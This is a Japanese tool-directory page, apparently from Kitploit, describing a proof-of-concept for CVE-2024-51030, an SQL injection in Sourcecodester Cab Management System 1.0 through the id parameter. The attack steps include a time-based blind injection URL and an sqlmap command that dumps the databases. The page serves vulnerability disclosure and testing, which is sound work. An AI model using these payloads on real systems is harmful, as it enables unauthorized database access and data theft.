Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-51030 — Sourcecodester Cab Management System 1.0のSQLインジェクションの概念実証エクスプロイト。manage_client.phpおよびview_cab.phpのidパラメータを介した任意のSQL実行を示します。 | Kitploit
ツール/GitHubGitHub/vighneshnair7/cve-2024-51030
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストデータベースセキュリティ
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

Sourcecodester Cab Management System 1.0のSQLインジェクションの概念実証エクスプロイト。manage_client.phpおよびview_cab.phpのidパラメータを介した任意のSQL実行を示します。

リポジトリを見る
121年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-51030

説明

Sourcecodester Cab Management System 1.0 の manage_client.php および view_cab.php における SQL インジェクションの脆弱性により、リモートの攻撃者が id パラメータを介して任意の SQL コマンドを実行でき、不正アクセスやデータベース内の機密データが侵害される可能性があります。

脆弱性の種類

SQL インジェクション

製品のベンダー

Sourcecodester

影響を受ける製品コードベース:

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

影響を受けるコンポーネント:

Sourcecodester Cab Management System v1.0 は、manage_client.php および view_cab.php ページの id パラメータを介した SQL インジェクションに対して脆弱です。

攻撃ベクトル:

  1. アプリケーションをローカルにセットアップし、提供されているデフォルトの管理者認証情報を使用してログインするか、(staff) のような低権限の管理者ユーザーでログインすることもできます。
  2. 次に、ブラウザで次の URL に移動します: http://localhost/cms/admin/?page=clients/manage_client&id=1
  3. SQL ペイロードを注入する: URL の id パラメータを変更して、ブールベースのブラインドまたは時間ベースのブラインド SQL インジェクションペイロードを含めます:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  • アプリケーションの応答を観察する: インジェクションが成功した場合、ページの読み込みに著しく長い時間(5秒)がかかるはずです。これにより、id パラメータが SQL インジェクションに対して脆弱であることが確認できます。
  • 次に、SQLMap ツールを使用してさらなる悪用とデータベースのダンプを行います。以下のコマンドを使用します: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
  • 参照:

    1. https://owasp.org/www-community/attacks/SQL_Injection
    2. https://portswigger.net/web-security/sql-injection
    ツールをダウンロード